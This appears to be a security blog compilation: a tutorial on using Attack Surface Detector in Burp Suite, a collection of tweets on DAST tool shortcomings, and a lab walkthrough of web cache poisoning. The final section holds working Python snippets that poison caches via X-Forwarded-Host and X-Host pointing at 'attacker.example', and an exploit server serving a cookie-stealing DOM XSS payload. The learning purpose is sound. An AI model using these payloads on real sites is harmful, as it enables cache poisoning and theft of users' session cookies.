In this post, we will see how Attack Surface Detector (ASD) can be used to expand the known attack surface of a web application. This is useful for improving the test coverage of many Dynamic Application Security Testing (DAST) tools. As I pointed out in this post, many DAST tools are not able to identify some attack surfaces during the spidering / crawling stage.
I will not go through how to install ASD.
First, clone this project and then run it. You will need to use Java 8; if you are using Java 11, set JAVA_HOME and PATH to point to a Java 8 JDK instead.
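As an illustration, a minimal sketch of launching the ASD command-line jar under a Java 8 environment might look like the following (the JDK path, jar name, and source path are assumptions; adjust them to your own setup):

```python
import os
import subprocess

JAVA8_HOME = "/usr/lib/jvm/java-8-openjdk-amd64"  # assumed location of a Java 8 JDK

env = os.environ.copy()
env["JAVA_HOME"] = JAVA8_HOME
env["PATH"] = os.path.join(JAVA8_HOME, "bin") + os.pathsep + env["PATH"]

# Run the ASD command-line jar against a web app's source tree
# (jar name and source path are placeholders for your own files).
subprocess.run(
    ["java", "-jar", "attack-surface-detector-cli.jar", "/path/to/webapp/source"],
    env=env,
    check=True,
)
```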
Please first follow this video on how to install the ASD extension in Burp Suite.
In the screenshot below, we can see that Target > Site map shows the highlighted endpoints generated by ASD. Select the highlighted endpoints and run an active scan.
We can see that Cross-Site Scripting issues are detected in the endpoints imported from the source code.
To verify, we can load one of the attack payloads and see the result.
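If you prefer to script the check instead of opening the payload in a browser, a quick sketch like the one below can replay a payload and confirm whether it comes back unencoded (the endpoint URL, parameter name, and payload here are purely illustrative assumptions):

```python
import requests

payload = "<script>alert(1)</script>"
resp = requests.get(
    "http://target.example/search",   # hypothetical endpoint imported from ASD
    params={"q": payload},            # hypothetical parameter name
)
# A naive check: if the payload appears verbatim, the response did not encode it.
print("Payload reflected unencoded:", payload in resp.text)
```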
Why is ASD useful?
There are times when a web application is so large that no one has an accurate inventory of its endpoints. This means there may be untested endpoints during DAST / manual testing. ASD helps ensure that at least the endpoints derived from the source code are included in testing.
Note that this is a collection of tweets about DAST (excluding any specific company pitches). In general, it seems that many companies are not yet able to realize the potential of DAST because of limitations in most DAST tools. This opens up an opportunity to create new DAST tools that overcome the current problems.
Summary
Many AppSec folks are struggling to get any real value out of commercial DAST tools. Common problems include tools being unable to record authentication properly and poor test coverage.
OWASP ZAP and Burp Enterprise Scanner are popular tools for DAST automation in DevSecOps pipelines.
Some AppSec folks are proxying their QA stage through ZAP or Burp in order to improve the test coverage of DAST scans.
“DAST biggest issue in modern apps is not exactly ‘testing’ or even ‘detecting’ vulns, but crawling the same website to identify to the attack surface.” ~ Jeremiah Grossman
OWASP Attack Surface Mapper tries to use SAST to pre-seed the attack surface for DAST scans.
Interesting Tweets about DAST
Decide what ROI looks like and make sure the tool meets your expectations. If your apps are complicated might be hard for DAST scanner to cover them properly. Not convinced I have ever seen a company get real value out of DAST. Maybe just make sure your pentester is uses Burp/ZAP
— Josh Grossman 👻 (tghosth) (@JoshCGrossman) June 4, 2020
I have experience with Netsparker, and. Wracked DAST. Honestly, depending on your environment and whose managing the tool I’d just go with BurpSuite Enterprise. DAST is fairly limited anyways.
This maybe controversial, but another point that came up w/ @clintgibler is that orgs are having trouble seeing value of DAST tools. Suspect coverage, problematic depth, FPs, and a high price tag make ppl think twice. #appsec
This talk gives some examples of why good DAST coverage on modern web apps is fundamentally hard: https://t.co/pL4AWlCgQy
Many companies using C/C++ are adopting fuzzing, which is 💯 @thedavidbrumley Do you think fuzzing provides value for non-C/C++ repos e.g. Python, Java…?
Coverage isn't the goal. Finding real bugs is. And if an automatic tool can increase your code coverage by 20% without having to resource a developer to do it, that seems like a win (that static analysis can't do).
I have long wanted to setup burpsuite to be the proxy for all tests used for QA and then allow it to run the attacker mode. Now that they have a headless option, I wonder how it would do. Since QA is likely hitting most endpoints, the tool knows endpoints and params to fuzz.
I know a number of AppSec teams have tried proxying integration tests through Burp then fuzz/attack mode, and found that it provides at least some baseline coverage.
Won't necessarily help with multi-step flows, but might be worth playing with.
Noooooooo you can't just point a DAST tool at a modern web application and expect it to be able to find all the content and test it for complex vulnerabilities
But they've been doing that for 15 years. Still none that I've seen actually do a good job of injesting and merging data from outside their tool (i.e. pen-tests, DAST tools, RASP tools, etc). Its frustrating because I've seen so many refer to running scans as their VM program.
— Alyssa Miller (Speaking at All Things Open) (@AlyssaM_InfoSec) May 14, 2020
I disagree. DAST is not perfect, but as it is often the last check prior to going live, it is hugely impirtant. If your company uses manual testing, that could be an alternative. As far as cost, use the popular open source tool #OWASP ZAProxy https://t.co/8ba6UDZdUN
IAST can give some of the benefits of DAST when used in the pipeline. You get speed but can still miss out on the coverage of DAST. You can "fail forward" by pushing to production after passing SAST&DAST scans and then run an asynchronous DAST scan and fix issues on next deploy.
That says that you don't know that your tool has failed you. It has. Did it fail to scan a SPA because it couldn't read routes? Did you have one where authentication stopped working and it ran for a week unauthenticated? Did your DAST tool ever find an IDOR vuln? 5/16
Previous oodles of data (defect densities, "what finds what", & measures related to remediation) lead me an opinion:
Activities (i.e. DAST, threat modeling, or tool du jour) don't tie directly to effectiveness. Effectiveness results from combining activities into capabilities.
Wonder why Vuln Management sucks? A test scan of 14 hosts with NO critical vulns takes 1hr+ and results in … a 571 page PDF. FIVE HUNDERD SEVENTY ONE PAGES???? This is insane. pic.twitter.com/R65KpTNIx6
It's more that the appsec toolsets themselves are integrating into the sdlc as it exists today (highly iterative), so SAST/SCA built into the IDE, invoked at check in, etc…DAST/IAST running continously in test or kicked off by a build tool, etc.
Whenever DAST vendors hmu I tell them to create a segment account (free), run their tool, send me the results, and if they're good we can talk. So far nobody has done this, not sure if it's because their results are bad or if they just aren't even trying.
I think it depends on the team. In my experience, some only want to make sure that the DAST tool doesn't log a new finding for every time a scan is run, others do want it to be collapsed. I know devs love smaller tickets, so something with 53 things to fix across all code…
DAST is meant to find vulnerabilities that adversaries may exploit. SAST is meant to find those same vulnerabilities earlier in the SDLC — but does it really? What’s the best data-backed evidence available in order to support or refute this claim? My search results are sparse.
When evaluating DAST vendors we struggled to find one that could authenticate to our app, and those that did limped through spidering. That sector has not kept up with single-page React apps.
A novice bug bounty hunter with Burp is the new DAST.
Proxying your acceptance tests through ZAP (or Burp) provides it with surface area for attacks. I agree, it's hard for these tools to get the full grasp of the surface area. That's why it's important to use a tool that is flexible & scriptable
DAST is anything but useless. For example it's tremendously helpful in complex application where the relationships between "code actually run in the browser" and "code in the repo" is anything but obvious. That's most modern apps.
This is an interesting tool, which used the power of SAST to feed DAST tools. Thinking about it – isn't the same as using OpenAPI/Swagger to feed DAST tools? What is the difference? https://t.co/v0aMD0rlgP
1. The Tool – What is/are the tools that map to the target tech stack
2. Deployment environment – Are scans intended for Dev, Integration or Staging
3. Time – How much time can be spared within the release cycle
Any one tool for API analysis is incomplete. A combo of IAST, DAST, Swagger, Manual investigation and other tools is what I see most mature shops (with good risk management) doing.
It's probably high time we saw some decent comparative analysis of DAST products, unless there's already some out there. There's room for everyone in the space, I think, but I also think it would be worth a look at the different qualities. #AppSec https://t.co/DU30agOqDD
IME, highly depends on DAST training and complexity of target being analyzed. Scan blind and go will result in most vulns being found by SAST. If you train DAST through selenium, swagger, and proxy logs, the two will relatively even. Neither will detect biz logic flaws.
My only concern with ZAP is if junior level AppSec engineers will be able to set it up, embed it into the CI environment, parse the results and provide enough info to sw dev teams (attack replay) to fix the issues found. Thoughts?
I've been anecdotally tracking the effectiveness of DAST (web app security scanners) for years. @Burp_Suite 's active scanner and @ArachniScanner are still my 100% front-runners.
Ayup. DAST biggest issue in modern apps is not exactly ‘testing’ or even ‘detecting’ vulns, but crawling the same website to identify to the attack surface.
Attack Surface Detector (ASD) Provides complete picture of web app’s exposed attack surface. Output used to “pre-seed” DAST tools for more thorough pen testing. Plugin available in the Portswigger Burp BApp Store. Download https://t.co/D48XBeAGHc @Burp_Suite @BApp_Store #PenTest
There is a lot of potential for product security teams to write passive/active scanner checks to avoid regressions or cover similar vulns – however the number of companies having dynamic testing as part of the CI/CD is still too small
These problems are not unique to Burp. The DAST market is wrought with products that can't handle modern application architecture, and I don't know of a single one that can. They are trying to accomplish a near impossible task. (5/10)
DAST solutions simply cannot effectively discover modern applications, and even if they could, cannot analyze with the context that is needed to discover authentication, authorization, session management, and business logic issues. (8/10)
Slow feedback loops in SAST, DAST, penetration tests, etc. things that force a leftward movement (a reset) in the pipeline are the problem. Feedback must be immediate, and the path for getting the feedback has to connect with the developer's existing environment. /FIN
— Alyssa Miller (Speaking at All Things Open) (@AlyssaM_InfoSec) September 16, 2020
An attacker can use the Web Cache Poisoning technique to serve a malicious response to other users. The poisoning happens when certain unkeyed inputs are not validated by the application, allowing the malicious response to be cached.
In the request, the attacker discovers that the X-Forwarded-Host value is reflected in the response. The application tries to load a tracking.js file from the cached resources. When the attacker passes a specific host in the X-Forwarded-Host header, the tracking.js file will be loaded from another path: <malicious host>/resources/js/tracking.js. Consequently, this allows the attacker to control the content of the tracking.js file and load malicious JavaScript (potentially leading to issues such as XSS).
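A minimal sketch of such a poisoning request, assuming hypothetical target and attacker host names, could look like this:

```python
import requests

TARGET = "https://vulnerable-site.example/"   # hypothetical target URL
ATTACKER_HOST = "attacker.example"            # hypothetical attacker-controlled host

# Send the unkeyed header so the reflected host ends up in the cached response.
resp = requests.get(TARGET, headers={"X-Forwarded-Host": ATTACKER_HOST})

# If this response gets cached, every user hitting the same cache key will now
# load /resources/js/tracking.js from the attacker's host.
print(resp.headers.get("X-Cache"))
print(ATTACKER_HOST in resp.text)
```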
In most situations, you will need to guess the unkeyed header. If you are using Burp Suite, then Param Miner is a useful extension for this.
First, go to the Target tab and select the paths in scope. Then right-click on the selected paths and click Guess Header.
If you are using Burp Pro, then you can see the results appearing in Dashboard > Issue activity.
Some sites may use the Vary header in the response to decide when to use the cached response or to refresh the response from the server. In the lab example, we can see that User-Agent is used to decide when the cached response is served. To target your victim, you will need to know their User-Agent and then use that User-Agent value in your poisoning request.
In our poisoning request, we have used the X-Host header and the victim's User-Agent. Keep sending the request until you see X-Cache: hit in the response.
In the Vary header, we see that User-Agent is used in the caching decision.
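A rough sketch of that replay loop, resending the poisoned request with the unkeyed X-Host header and the victim's User-Agent until the cache serves it back, might look like this (the host names and User-Agent string are assumptions):

```python
import requests

TARGET = "https://vulnerable-site.example/"        # hypothetical target URL
headers = {
    "X-Host": "attacker.example",                  # unkeyed header found earlier
    "User-Agent": "Mozilla/5.0 (Victim Browser)",  # must match the victim's UA (Vary: User-Agent)
}

for _ in range(20):
    resp = requests.get(TARGET, headers=headers)
    # Stop once the cache reports a hit, i.e. the poisoned response is stored.
    if resp.headers.get("X-Cache", "").lower() == "hit":
        print("Poisoned response is now cached for this User-Agent")
        break
```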
In this example, we see how Web Cache Poisoning can cause DOM XSS in an application. In some cases, an application takes property values from a JSON response and then uses those values dynamically in the DOM. The assumption is that these property values can be trusted since they are controlled by the application. However, if the application is susceptible to Web Cache Poisoning, then these property values can be controlled by the attacker.
In the example, we first see that there is a host injection issue: if you use X-Forwarded-Host, the injected host value will be reflected in the response.
In the response, we can also see that the injected host name will be used for retrieving a JSON value. Using the exploit server provided in the lab, we can see in the access log that a user is making a GET request to retrieve the geolocate.json file.
If we examine the JavaScript carefully, we can see that the country value is taken from the JSON file and then assigned to innerHTML. This is a classic DOM XSS sink to take note of.
After tracing the original JSON value, we can see that there is a property called ‘country’ which contains the value that will be passed to innerHTML.
UI showing the JSON value
Since we have found the attack surface, we can now create a JSON file on the exploit server. This will return a JSON response which contains the DOM XSS payload. Access-Control-Allow-Origin needs to be a wildcard in order for the object to be shared with the application.
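As a minimal stand-in for that exploit server response, the sketch below serves a geolocate.json whose 'country' property carries a DOM XSS payload and sets the wildcard CORS header (the port, payload, and property name are assumptions based on the lab description):

```python
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

XSS_PAYLOAD = "<img src=x onerror=alert(document.cookie)>"  # example payload only

class ExploitHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve a JSON body whose 'country' property carries the DOM XSS payload.
        body = json.dumps({"country": XSS_PAYLOAD}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Access-Control-Allow-Origin", "*")  # wildcard CORS so the app can read it
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

HTTPServer(("0.0.0.0", 8000), ExploitHandler).serve_forever()
```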
After this is completed, we can see that the Web Cache Poisoning is successful and the DOM XSS payload is executed.